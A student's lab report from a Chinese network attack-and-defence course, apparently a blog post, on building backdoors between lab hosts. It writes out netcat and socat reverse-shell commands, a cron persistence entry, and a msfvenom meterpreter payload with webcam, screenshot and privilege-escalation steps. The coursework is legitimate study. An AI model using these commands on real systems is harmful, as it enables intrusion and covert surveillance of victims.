20154329 《网络对抗技术》后门原理与实践

Exp2后门原理与实践

实验准备

1.知识储备
关于netcat:
又名nc,ncat.是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。
2.f附件准备
在课程主页下载附件ncat.exe和socat.exe

实验过程

任务一:使用netcat获取主机操作Shell,cron启动

一、Win获得Linux Shell

1.Windows下,使用ipconfig指令查看本机ip为172.30.6.239

2.windows调用ncat.exe程序打开监听,监听端口为4329

3.在Linux中使用nc指令的-e参数反弹连接win
nc #win主机ip# #端口# -e /bin/sh
##### 

4. windows下获得一个linux shell,可运行任何linux指令,如输入ls:

二、 Linux获得Win Shell

1. 在Linux下使用ifconfig指令查看linux主机IP为:172.30.2.75

2.Linux下使用指令运行监听:
nc -l -p 端口号
3. 在windows中使用ncat.exe指令以及-e参数反弹连接Linux:

4. Linux下可看到Windows的命令提示,输入windows的 ipconfig命令成功查看到windows主机的IP:

nc传输数据
  1. windows打开端口4329
    2.让Linux连接到端口4329
    3.建立连接后传输数据,可实现互传

三、cron启动

1.Windows->控制面板->管理工具->任务计划程序,创建任务:

在参数中填入下列代码

socat.exe tcp-listen:4329 exec:cmd,pty,stderr

2.Windows输入指令监听
ncat.exe -l -p 端口号

3.Linux输入指令,选择一个文本编辑器打开
crotab –e  //-e 表示编辑,按a进入编辑界面 
在最后一行添加代码:
n * * * * /bin/netcat Win IP 端口 -e /bin/sh
//esc退出编辑; :wq 保存退出
在每小时的n分运行ncat回连win主机

任务二 使用socat获取主机操作Shell, 任务计划启动

在Linux系统下,输入命令:
socat - tcp:  win主机ip
可以成功获得一个cmd shell,可以输入指令,例如ipconfig

任务三 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell。

1.在Linux上输入指令,生成一个名称为4329.exe 后门可执行文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.199.132 LPORT=4319 -f exe >4319.exe

2.将后门可执行文件copy到windows主机上
3.在Linux下,MSF打开监听进程:
msfconsole


4.在msf>下输入命令
use exploit/multi/handler
继续输入命令设置payload
set payload windows/meterpreter/reverse_tcp
set LHOST 172.30.2.75//Linux IP
set LPORT 4329 //端口号

5.linux开启监听,windows运行后门

1.Linux输入指令 exploit 开始监听

2.windows主机双击后门木马程序执行

Linux主机操控Windows主机
输入指令截取屏幕
screenshot 


输入指令拍摄照片
webcam_snap

(就问你怕不怕hhh)

输入指令getuid查看当前用户,输入指令getsystem 提权

(其实这张图好长好长......)

回答问题

1.例举你能想到的一个后门进入到你系统中的可能方式?

下载软件准备安装时,杀毒软件总会提醒我 该文件不安全,是否继续安装,而我为了使用这个软件,通常情况下都会选择允许本次我想,此时就是后门进入我系统的最好时机,后门可执行程序和软件被我一起下载,运行安装软件时也运行了后门程序,so......可能就中招了。

2.例举你知道的后门如何启动起来(win及linux)的方式?

emmmm,我第一问回答的猜想算不算一种启动方式?

3.Meterpreter有哪些给你映像深刻的功能?

哇,之前某位老师说她会把笔记本的摄像头用胶布贴起来,我竟然觉得她的做法有点没用,我以为......泄密无处不在,遮摄像头就有用吗?现在看来,当时有用啊!

4.如何发现自己有系统有没有被安装后门?

使用杀毒软件!实验中,当我双击运行4329.exe后门可执行文件时,我的杀毒软件提醒我——这是个木马程序。hhhh,退出杀毒程序的那一瞬间,杀毒软件带走了我的小木马。

实验心得

实验最开始的时候出现了如图所示

当时心里就凉了,刚开始实验就有问题,命途多舛?但后来发现,这真的是个简单的不能再简单的问题
C:\User\Vermillion>F:\pc2\ncat\ncat.exe就可以了

我已经迫不及待地准备学习免杀小木马了。不知不觉打开你的摄像头,是不是让你脊背发凉?hhh,偷偷打开摄像头给你拍几张黑招。interesting之后就是worried了。杀毒软件果然还是存在的好。

posted @ 2018-03-31 21:12  20154329  阅读(195)  评论(0编辑  收藏  举报